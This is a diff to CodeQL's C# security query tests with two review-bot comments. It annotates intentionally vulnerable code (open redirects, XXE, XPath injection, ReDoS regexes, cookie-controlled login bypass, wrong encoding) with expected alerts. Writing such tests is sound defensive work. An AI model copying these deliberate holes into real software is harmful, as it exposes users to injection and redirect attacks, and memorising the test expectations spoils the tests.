@@ -35,8 +35,8 @@ public void ProcessRequest(HttpContext ctx) } // BAD: Adding or appending a header - ctx.Response.AddHeader("Location", ctx.Request.QueryString["page"]); - ctx.Response.AppendHeader("Location", ctx.Request.QueryString["page"]); + ctx.Response.AddHeader("Location", ctx.Request.QueryString["page"]); // $ Alert[cs/web/unvalidated-url-redirection]=r3 $ Alert[cs/web/unvalidated-url-redirection]=r3 + ctx.Response.AppendHeader("Location", ctx.Request.QueryString["page"]); // $ Alert[cs/web/unvalidated-url-redirection]=r4 $ Alert[cs/web/unvalidated-url-redirection]=r4 // GOOD: Redirecting to the RawUrl only reloads the current Url ctx.Response.Redirect(ctx.Request.RawUrl); @@ -45,7 +45,7 @@ public void ProcessRequest(HttpContext ctx) ctx.Response.Redirect("foo.asp?param=" + url); // BAD: Using Transfer with unvalidated user input - ctx.Server.Transfer(url); + ctx.Server.Transfer(url); // $ Alert[cs/web/unvalidated-url-redirection]=r5 // GOOD: request parameter is URL encoded ctx.Response.Redirect(HttpUtility.UrlEncode(ctx.Request.QueryString["page"])); 
@@ -61,19 +61,19 @@ public void ProcessRequest(HttpContext ctx) ctx.Response.Redirect($"foo.asp?param={url}"); // BAD: The attacker can control the location - ctx.Response.Redirect($"{url}.asp?param=foo"); + ctx.Response.Redirect($"{url}.asp?param=foo"); // $ Alert[cs/web/unvalidated-url-redirection]=r6 // GOOD: The attacker can only control the parameters, not the location ctx.Response.Redirect(string.Format("foo.asp?param={0}", url)); // BAD: The attacker can control the location - ctx.Response.Redirect(string.Format("{0}.asp?param=foo", url)); + ctx.Response.Redirect(string.Format("{0}.asp?param=foo", url)); // $ Alert[cs/web/unvalidated-url-redirection]=r7 // GOOD: The attacker can only control the parameters, not the location ctx.Response.Redirect(string.Format("foo.asp?{1}param={0}", url, url)); // BAD: The attacker can control the location - ctx.Response.Redirect(string.Format("{1}.asp?{0}param=foo", url, url)); + ctx.Response.Redirect(string.Format("{1}.asp?{0}param=foo", url, url)); // $ Alert[cs/web/unvalidated-url-redirection]=r8 } // Implementation as recommended by Microsoft. diff --git a/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirect.qlref b/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirect.qlref index fdb38b9ffc00..c24957fa4a02 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirect.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirect.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-601/UrlRedirect.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirect2.cs b/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirect2.cs index 83f499ea048d..6093fbeeb4a7 100644 
--- a/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirect2.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirect2.cs @@ -11,7 +11,7 @@ public class UrlRedirectHandler2 : IHttpHandler public void ProcessRequest(HttpContext ctx) { // BAD: a request parameter is incorporated without validation into a URL redirect - ctx.Response.Redirect(ctx.Request.QueryString["page"]); + ctx.Response.Redirect(ctx.Request.QueryString["page"]); // $ Alert[cs/web/unvalidated-url-redirection]=r1 $ Alert[cs/web/unvalidated-url-redirection]=r1 var redirectUrl = ctx.Request.QueryString["page"]; if (VALID_REDIRECTS.Contains(redirectUrl)) diff --git a/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirectCore.cs b/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirectCore.cs index 2da9652d8547..b147be0fe32a 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirectCore.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-601/UrlRedirect/UrlRedirectCore.cs 
@@ -10,50 +10,50 @@ public class SomeController : ControllerBase private static string SomeValue = "HeaderValue"; [HttpPost] - public void Post([FromBody] string value) + public void Post([FromBody] string value) // $ Source[cs/web/unvalidated-url-redirection]=r9 $ Source[cs/web/unvalidated-url-redirection]=r10 $ Source[cs/web/unvalidated-url-redirection]=r11 $ Source[cs/web/unvalidated-url-redirection]=r12 $ Source[cs/web/unvalidated-url-redirection]=r13 $ Source[cs/web/unvalidated-url-redirection]=r14 $ Source[cs/web/unvalidated-url-redirection]=r15 { // BAD: straight up controller redirect - Redirect(value); + Redirect(value); // $ Alert[cs/web/unvalidated-url-redirection]=r9 // BAD: Setting response headers collection, location = redirect - Response.Headers["location"] = value; + Response.Headers["location"] = value; // $ Alert[cs/web/unvalidated-url-redirection]=r10 // GOOD: Setting response header to a constant value Response.Headers["location"] = SomeValue; // BAD: Setting response headers collection, location = redirect via add method - Response.Headers.Add("location", value); + Response.Headers.Add("location", value); // $ Alert[cs/web/unvalidated-url-redirection]=r11 // GOOD: Setting response header to a constant value Response.Headers.Add("location", "foo"); // BAD: redirect via location - Response.Headers.SetCommaSeparatedValues("location", value); + Response.Headers.SetCommaSeparatedValues("location", value); // $ Alert[cs/web/unvalidated-url-redirection]=r12 // BAD = redirect via setting location value from tainted source - Response.Headers.Append("location", value); + Response.Headers.Append("location", value); // $ Alert[cs/web/unvalidated-url-redirection]=r13 // BAD: redirect via setting location header from comma-separated values - Response.Headers.AppendCommaSeparatedValues("location", value); + Response.Headers.AppendCommaSeparatedValues("location", value); // $ Alert[cs/web/unvalidated-url-redirection]=r14 // BAD: tainted redirect to Action - 
RedirectToActionPermanent("Error" + value); + RedirectToActionPermanent("Error" + value); // $ Alert[cs/web/unvalidated-url-redirection]=r15 } // PUT: api/Some/5 [HttpPut("{id}")] - public void Put(int id, [FromBody] string value) + public void Put(int id, [FromBody] string value) // $ Source[cs/web/unvalidated-url-redirection]=r16 $ Source[cs/web/unvalidated-url-redirection]=r17 $ Source[cs/web/unvalidated-url-redirection]=r18 { - RedirectToPage(value); + RedirectToPage(value); // $ Alert[cs/web/unvalidated-url-redirection]=r16 var headers = new ResponseHeaders(Response.Headers); // BAD: redirect via header helper class - headers.Location = new Uri(value); + headers.Location = new Uri(value); // $ Alert[cs/web/unvalidated-url-redirection]=r17 // BAD: response redirect - Response.Redirect(value); + Response.Redirect(value); // $ Alert[cs/web/unvalidated-url-redirection]=r18 // GOOD: whitelisted redirect if(Url.IsLocalUrl(value)) diff --git a/csharp/ql/test/query-tests/Security Features/CWE-611/Test.cs b/csharp/ql/test/query-tests/Security Features/CWE-611/Test.cs index 005e79a7fb4f..103d3cca4cc0 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-611/Test.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-611/Test.cs @@ -8,7 +8,7 @@ public class XMLHandler : IHttpHandler public void ProcessRequest(HttpContext ctx) { // BAD: XmlTextReader is insecure with these options, using user-provided data - XmlTextReader reader = new XmlTextReader(ctx.Request.QueryString["document"]) { DtdProcessing = DtdProcessing.Parse, XmlResolver = new XmlUrlResolver() }; + XmlTextReader reader = new XmlTextReader(ctx.Request.QueryString["document"]) { DtdProcessing = DtdProcessing.Parse, XmlResolver = new XmlUrlResolver() }; // $ Alert[cs/xml/insecure-dtd-handling]=r1 $ Alert[cs/xml/insecure-dtd-handling]=r1 $ Alert[cs/insecure-xml-read] } public void insecureXMLBad(string content) 
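Review bot: In UrlRedirectCore.cs, `RedirectToPage(value);` at the top of `Put` is now expected to alert (`r16`) but is the only annotated sink in this hunk with no `// BAD:` comment. Every other sink in `Post` and `Put` states why it is flagged. Adding `// BAD: tainted redirect to page` above it would keep the file consistent and document why the unvalidated `[FromBody]` value is a redirect target here. `Put` continues past the end of the hunk, where the `Url.IsLocalUrl(value)` case begins.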
@@ -18,10 +18,10 @@ public void insecureXMLBad(string content) settings.XmlResolver = new XmlUrlResolver(); // BAD: insecure settings - XmlReader reader1 = XmlReader.Create(content, settings); + XmlReader reader1 = XmlReader.Create(content, settings); // $ Alert[cs/insecure-xml-read] // BAD: XmlTextReader is insecure with these options - XmlTextReader reader2 = new XmlTextReader(content) { DtdProcessing = DtdProcessing.Parse, XmlResolver = new XmlUrlResolver() }; + XmlTextReader reader2 = new XmlTextReader(content) { DtdProcessing = DtdProcessing.Parse, XmlResolver = new XmlUrlResolver() }; // $ Alert[cs/insecure-xml-read] } public void insecureXMLGood(string content) diff --git a/csharp/ql/test/query-tests/Security Features/CWE-611/UntrustedDataInsecureXml.qlref b/csharp/ql/test/query-tests/Security Features/CWE-611/UntrustedDataInsecureXml.qlref index 7f685106e250..8cc567d8a970 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-611/UntrustedDataInsecureXml.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-611/UntrustedDataInsecureXml.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-611/UntrustedDataInsecureXml.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-611/UseXmlSecureResolver.qlref b/csharp/ql/test/query-tests/Security Features/CWE-611/UseXmlSecureResolver.qlref index b11f53079246..851c79c15932 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-611/UseXmlSecureResolver.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-611/UseXmlSecureResolver.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-611/UseXmlSecureResolver.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql 
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/HttpCookiesCorrect/RequireSSL.qlref b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/HttpCookiesCorrect/RequireSSL.qlref index 58ec5162739a..1a762e07498e 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/HttpCookiesCorrect/RequireSSL.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/HttpCookiesCorrect/RequireSSL.qlref @@ -1 +1,2 @@ query: Security Features/CWE-614/RequireSSL.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/HttpCookiesCorrect/Web.config b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/HttpCookiesCorrect/Web.config index 1ddaaf2b65f2..7755ae7462d4 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/HttpCookiesCorrect/Web.config +++ b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/HttpCookiesCorrect/Web.config @@ -2,7 +2,7 @@ - + diff --git a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/RequireSSLMissing/RequireSSL.qlref b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/RequireSSLMissing/RequireSSL.qlref index 58ec5162739a..1a762e07498e 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/RequireSSLMissing/RequireSSL.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/RequireSSLMissing/RequireSSL.qlref @@ -1 +1,2 @@ query: Security Features/CWE-614/RequireSSL.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/RequireSSLMissing/Web.config b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/RequireSSLMissing/Web.config index 0ab64b1fcb62..45f9f219f096 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/RequireSSLMissing/Web.config 
+++ b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/RequireSSLMissing/Web.config @@ -2,8 +2,8 @@ - + - + diff --git a/csharp/ql/test/query-tests/Security Features/CWE-643/XPathInjection.cs b/csharp/ql/test/query-tests/Security Features/CWE-643/XPathInjection.cs index a42a629cc7ec..4ce6e1268a72 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-643/XPathInjection.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-643/XPathInjection.cs 
@@ -8,16 +8,16 @@ public class XPathInjectionHandler : IHttpHandler { public void ProcessRequest(HttpContext ctx) { - string userName = ctx.Request.QueryString["userName"]; - string password = ctx.Request.QueryString["password"]; + string userName = ctx.Request.QueryString["userName"]; // $ Source[cs/xml/xpath-injection]=r1 $ Source[cs/xml/xpath-injection]=r3 $ Source[cs/xml/xpath-injection]=r5 $ Source[cs/xml/xpath-injection]=r7 $ Source[cs/xml/xpath-injection]=r9 $ Source[cs/xml/xpath-injection]=r11 $ Source[cs/xml/xpath-injection]=r13 + string password = ctx.Request.QueryString["password"]; // $ Source[cs/xml/xpath-injection]=r2 $ Source[cs/xml/xpath-injection]=r4 $ Source[cs/xml/xpath-injection]=r6 $ Source[cs/xml/xpath-injection]=r8 $ Source[cs/xml/xpath-injection]=r10 $ Source[cs/xml/xpath-injection]=r12 $ Source[cs/xml/xpath-injection]=r14 var s = "//users/user[login/text()='" + userName + "' and password/text() = '" + password + "']/home_dir/text()"; // BAD: User input used directly in an XPath expression - XPathExpression.Compile(s); + XPathExpression.Compile(s); // $ Alert[cs/xml/xpath-injection]=r1 $ Alert[cs/xml/xpath-injection]=r2 XmlNode xmlNode = null; // BAD: User input used directly in an XPath expression to SelectNodes - xmlNode.SelectNodes(s); + xmlNode.SelectNodes(s); // $ Alert[cs/xml/xpath-injection]=r3 $ Alert[cs/xml/xpath-injection]=r4 // GOOD: Uses parameters to avoid including user input directly in XPath expression var expr = XPathExpression.Compile("//users/user[login/text()=$username]/home_dir/text()"); 
@@ -26,31 +26,31 @@ public void ProcessRequest(HttpContext ctx) var nav = doc.CreateNavigator(); // BAD - nav.Select(s); + nav.Select(s); // $ Alert[cs/xml/xpath-injection]=r5 $ Alert[cs/xml/xpath-injection]=r6 // GOOD nav.Select(expr); // BAD - nav.SelectSingleNode(s); + nav.SelectSingleNode(s); // $ Alert[cs/xml/xpath-injection]=r7 $ Alert[cs/xml/xpath-injection]=r8 // GOOD nav.SelectSingleNode(expr); // BAD - nav.Compile(s); + nav.Compile(s); // $ Alert[cs/xml/xpath-injection]=r9 $ Alert[cs/xml/xpath-injection]=r10 // GOOD nav.Compile("//users/user[login/text()=$username]/home_dir/text()"); // BAD - nav.Evaluate(s); + nav.Evaluate(s); // $ Alert[cs/xml/xpath-injection]=r11 $ Alert[cs/xml/xpath-injection]=r12 // Good nav.Evaluate(expr); // BAD - nav.Matches(s); + nav.Matches(s); // $ Alert[cs/xml/xpath-injection]=r13 $ Alert[cs/xml/xpath-injection]=r14 // GOOD nav.Matches(expr); 
@@ -71,17 +71,17 @@ public void ProcessStoredRequest() { connection.Open(); SqlCommand customerCommand = new SqlCommand("SELECT * FROM customers", connection); - SqlDataReader customerReader = customerCommand.ExecuteReader(); + SqlDataReader customerReader = customerCommand.ExecuteReader(); // $ Source[cs/xml/xpath-injection]=r15 $ Source[cs/xml/xpath-injection]=r16 while (customerReader.Read()) { string userName = customerReader.GetString(1); string password = customerReader.GetString(2); // BAD: User input used directly in an XPath expression - XPathExpression.Compile("//users/user[login/text()='" + userName + "' and password/text() = '" + password + "']/home_dir/text()"); + XPathExpression.Compile("//users/user[login/text()='" + userName + "' and password/text() = '" + password + "']/home_dir/text()"); // $ Alert[cs/xml/xpath-injection]=r15 XmlNode xmlNode = null; // BAD: User input used directly in an XPath expression to SelectNodes - xmlNode.SelectNodes("//users/user[login/text()='" + userName + "' and password/text() = '" + password + "']/home_dir/text()"); + xmlNode.SelectNodes("//users/user[login/text()='" + userName + "' and password/text() = '" + password + "']/home_dir/text()"); // $ Alert[cs/xml/xpath-injection]=r16 // GOOD: Uses parameters to avoid including user input directly in XPath expression XPathExpression.Compile("//users/user[login/text()=$username]/home_dir/text()"); diff --git a/csharp/ql/test/query-tests/Security Features/CWE-643/XPathInjection.qlref b/csharp/ql/test/query-tests/Security Features/CWE-643/XPathInjection.qlref index a0cdca4727ae..9ffeeb3a2929 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-643/XPathInjection.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-643/XPathInjection.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-643/XPathInjection.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql 
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-730/ReDoS/ExponentialRegex.cs b/csharp/ql/test/query-tests/Security Features/CWE-730/ReDoS/ExponentialRegex.cs index b54b3bbdf81f..30d706fb7f17 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-730/ReDoS/ExponentialRegex.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-730/ReDoS/ExponentialRegex.cs @@ -8,20 +8,20 @@ public class RegexHandler : IHttpHandler public void ProcessRequest(HttpContext ctx) { - string userInput = ctx.Request.QueryString["userInput"]; + string userInput = ctx.Request.QueryString["userInput"]; // $ Source[cs/redos]=r1 $ Source[cs/redos]=r2 $ Source[cs/redos]=r3 $ Source[cs/redos]=r4 $ Source[cs/redos]=r5 // BAD: // Artificial regexes - new Regex("^([a-z]+)+$").Match(userInput); - new Regex("^([a-z]*)*$").Replace(userInput, ""); + new Regex("^([a-z]+)+$").Match(userInput); // $ Alert[cs/redos]=r1 + new Regex("^([a-z]*)*$").Replace(userInput, ""); // $ Alert[cs/redos]=r2 // Known exponential blowup regex for e-mail address validation // Problematic part is: ([a-zA-Z0-9]+))* - new Regex("^([a-zA-Z0-9])(([\\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$").Match(userInput); + new Regex("^([a-zA-Z0-9])(([\\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$").Match(userInput); // $ Alert[cs/redos]=r3 // Known exponential blowup regex for Java class name validation // Problematic part is: (([a-z])+.)+ - new Regex(JAVA_CLASS_REGEX).Match(userInput); + new Regex(JAVA_CLASS_REGEX).Match(userInput); // $ Alert[cs/redos]=r4 // Static use - Regex.Match(userInput, JAVA_CLASS_REGEX); + Regex.Match(userInput, JAVA_CLASS_REGEX); // $ Alert[cs/redos]=r5 // GOOD: new Regex("^(([a-b]+[c-z]+)+$").Match(userInput); new Regex("^([a-z]+)+$", RegexOptions.IgnoreCase, TimeSpan.FromSeconds(1)).Match(userInput); 
diff --git a/csharp/ql/test/query-tests/Security Features/CWE-730/ReDoS/ReDoS.qlref b/csharp/ql/test/query-tests/Security Features/CWE-730/ReDoS/ReDoS.qlref index de8c70102e05..e3f22da0ebeb 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-730/ReDoS/ReDoS.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-730/ReDoS/ReDoS.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-730/ReDoS.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-730/ReDoSGlobalTimeout/ReDoS.qlref b/csharp/ql/test/query-tests/Security Features/CWE-730/ReDoSGlobalTimeout/ReDoS.qlref index de8c70102e05..e3f22da0ebeb 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-730/ReDoSGlobalTimeout/ReDoS.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-730/ReDoSGlobalTimeout/ReDoS.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-730/ReDoS.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-730/RegexInjection/RegexInjection.cs b/csharp/ql/test/query-tests/Security Features/CWE-730/RegexInjection/RegexInjection.cs index d5f802a02687..877a029de660 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-730/RegexInjection/RegexInjection.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-730/RegexInjection/RegexInjection.cs 
@@ -7,11 +7,11 @@ public class RegexInjectionHandler : IHttpHandler public void ProcessRequest(HttpContext ctx) { - string regex = ctx.Request.QueryString["regex"]; + string regex = ctx.Request.QueryString["regex"]; // $ Source[cs/regex-injection]=r1 string userInput = ctx.Request.QueryString["userInput"]; // BAD: User input used as regex - new Regex(regex).Match(userInput); + new Regex(regex).Match(userInput); // $ Alert[cs/regex-injection]=r1 // GOOD: User input escaped before being used as regex new Regex(Regex.Escape(regex)).Match(userInput); } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-730/RegexInjection/RegexInjection.qlref b/csharp/ql/test/query-tests/Security Features/CWE-730/RegexInjection/RegexInjection.qlref index bec7fbac79a5..82cad8aeb6bd 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-730/RegexInjection/RegexInjection.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-730/RegexInjection/RegexInjection.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-730/RegexInjection.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-807/ConditionalBypass.cs b/csharp/ql/test/query-tests/Security Features/CWE-807/ConditionalBypass.cs index 7ab297fbb686..40b3806f71f2 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-807/ConditionalBypass.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-807/ConditionalBypass.cs 
@@ -9,22 +9,22 @@ public void ProcessRequest(HttpContext ctx) { string user = ctx.Request.QueryString["user"]; string password = ctx.Request.QueryString["password"]; - string isAdmin = ctx.Request.QueryString["isAdmin"]; + string isAdmin = ctx.Request.QueryString["isAdmin"]; // $ Source[cs/user-controlled-bypass]=r1 // BAD: login is only executed if isAdmin is false, but isAdmin // is controlled by the user - if (isAdmin == "false") + if (isAdmin == "false") // $ Alert[cs/user-controlled-bypass]=r1 login(user, password); - HttpCookie adminCookie = ctx.Request.Cookies["adminCookie"]; + HttpCookie adminCookie = ctx.Request.Cookies["adminCookie"]; // $ Source[cs/user-controlled-bypass]=r2 $ Source[cs/user-controlled-bypass]=r3 $ Source[cs/user-controlled-bypass]=r4 // BAD: login is only executed if the cookie value is false, but the cookie // is controlled by the user - if (adminCookie.Value.Equals("false")) + if (adminCookie.Value.Equals("false")) // $ Alert[cs/user-controlled-bypass]=r2 login(user, password); // FALSE POSITIVES: both methods are conditionally executed, but they probably // both perform the security-critical action - if (adminCookie.Value == "false") + if (adminCookie.Value == "false") // $ Alert[cs/user-controlled-bypass]=r3 $ Alert[cs/user-controlled-bypass]=r4 { login(user, password); } 
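Review bot: The condition under the `// FALSE POSITIVES:` comment is annotated as an ordinary expected result, `// $ Alert[cs/user-controlled-bypass]=r3 $ Alert[cs/user-controlled-bypass]=r4`, which records a result the test author considers wrong as the desired behaviour. Inline expectations have a `SPURIOUS:` prefix for this case, so I would write `// $ SPURIOUS: Alert[cs/user-controlled-bypass]=r3 Alert[cs/user-controlled-bypass]=r4`; the matching `Source` ids on the `adminCookie` line may need the same treatment. That keeps the test passing today and flags the line when the query is tightened. `Test3` in the last hunk of this file has no BAD/GOOD comment next to its new `=r8` alert, so a one-line comment stating which it is would help. `ProcessRequest` starts before this hunk and continues after it.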
@@ -39,14 +39,14 @@ public void ProcessRequest(HttpContext ctx) // BAD: DNS may be controlled by the user IPAddress hostIPAddress = IPAddress.Parse("1.2.3.4"); - IPHostEntry hostInfo = Dns.GetHostByAddress(hostIPAddress); + IPHostEntry hostInfo = Dns.GetHostByAddress(hostIPAddress); // $ Source[cs/user-controlled-bypass]=r5 $ Source[cs/user-controlled-bypass]=r6 // Exact comparison - if (hostInfo.HostName == "trustme.com") + if (hostInfo.HostName == "trustme.com") // $ Alert[cs/user-controlled-bypass]=r5 { login(user, password); } // Substring comparison - if (hostInfo.HostName.EndsWith("trustme.com")) + if (hostInfo.HostName.EndsWith("trustme.com")) // $ Alert[cs/user-controlled-bypass]=r6 { login(user, password); } @@ -67,9 +67,9 @@ public static void Test(HttpContext ctx, String user, String password) public static void Test2(HttpContext ctx, String user, String password) { - HttpCookie adminCookie = ctx.Request.Cookies["adminCookie"]; + HttpCookie adminCookie = ctx.Request.Cookies["adminCookie"]; // $ Source[cs/user-controlled-bypass]=r7 // BAD: login may happen once or twice - if (adminCookie.Value == "false") + if (adminCookie.Value == "false") // $ Alert[cs/user-controlled-bypass]=r7 login(user, password); else { @@ -80,8 +80,8 @@ public static void Test2(HttpContext ctx, String user, String password) public static void Test3(HttpContext ctx, String user, String password) { - HttpCookie adminCookie = ctx.Request.Cookies["adminCookie"]; - if (adminCookie.Value == "false") + HttpCookie adminCookie = ctx.Request.Cookies["adminCookie"]; // $ Source[cs/user-controlled-bypass]=r8 + if (adminCookie.Value == "false") // $ Alert[cs/user-controlled-bypass]=r8 login(user, password); else { diff --git a/csharp/ql/test/query-tests/Security Features/CWE-807/ConditionalBypass.qlref b/csharp/ql/test/query-tests/Security Features/CWE-807/ConditionalBypass.qlref index b0c208da3481..fe01c7557afa 100644 
--- a/csharp/ql/test/query-tests/Security Features/CWE-807/ConditionalBypass.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-807/ConditionalBypass.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-807/ConditionalBypass.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-838/HtmlEncode.cs b/csharp/ql/test/query-tests/Security Features/CWE-838/HtmlEncode.cs index 8a5e378c8d13..66ad8fb4c1a4 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-838/HtmlEncode.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-838/HtmlEncode.cs @@ -7,7 +7,7 @@ public class HtmlEncode public static void Bad(HttpContext ctx) { var user = WebUtility.UrlDecode(ctx.Request.QueryString["user"]); - ctx.Response.Write("Hello, " + WebUtility.UrlEncode(user)); + ctx.Response.Write("Hello, " + WebUtility.UrlEncode(user)); // $ Alert[cs/inappropriate-encoding]=r1 $ Alert[cs/inappropriate-encoding]=r1 } public static void Good(HttpContext ctx) diff --git a/csharp/ql/test/query-tests/Security Features/CWE-838/InappropriateEncoding.cs b/csharp/ql/test/query-tests/Security Features/CWE-838/InappropriateEncoding.cs index 637988ddc84d..5a9bfd554965 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-838/InappropriateEncoding.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-838/InappropriateEncoding.cs 
@@ -10,12 +10,12 @@ public class InappropriateEncoding { public void Sql(string value) { - var encodedValue = Encode(value); + var encodedValue = Encode(value); // $ Source[cs/inappropriate-encoding]=r2 using (var connection = new SqlConnection("")) { var query1 = "SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='" + encodedValue + "' ORDER BY PRICE"; // BAD - var adapter = new SqlDataAdapter(query1, connection); + var adapter = new SqlDataAdapter(query1, connection); // $ Alert[cs/inappropriate-encoding]=r2 $ Alert[cs/inappropriate-encoding]=r3 var query2 = "SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=@category ORDER BY PRICE"; // GOOD @@ -28,13 +28,13 @@ public void Sql(string value) public void Html(string value, Label label, System.Windows.Forms.HtmlElement html) { // BAD - label.Text = Encode(value); - label.Text = HttpUtility.UrlEncode(value); - label.Text = HttpUtility.UrlEncode(HttpUtility.HtmlEncode(value)); - var encodedValue = HttpUtility.UrlEncode(value); - html.SetAttribute("a", encodedValue); - label.Text = ""; - label.Text = string.Format("", encodedValue); + label.Text = Encode(value); // $ Alert[cs/inappropriate-encoding]=r4 $ Alert[cs/inappropriate-encoding]=r4 + label.Text = HttpUtility.UrlEncode(value); // $ Alert[cs/inappropriate-encoding]=r5 $ Alert[cs/inappropriate-encoding]=r5 + label.Text = HttpUtility.UrlEncode(HttpUtility.HtmlEncode(value)); // $ Alert[cs/inappropriate-encoding]=r6 $ Alert[cs/inappropriate-encoding]=r6 + var encodedValue = HttpUtility.UrlEncode(value); // $ Source[cs/inappropriate-encoding]=r7 $ Source[cs/inappropriate-encoding]=r8 $ Source[cs/inappropriate-encoding]=r9 + html.SetAttribute("a", encodedValue); // $ Alert[cs/inappropriate-encoding]=r7 + label.Text = ""; // $ Alert[cs/inappropriate-encoding]=r8 + label.Text = string.Format("", encodedValue); // $ Alert[cs/inappropriate-encoding]=r9 // GOOD label.Text = HttpUtility.HtmlEncode(value); 
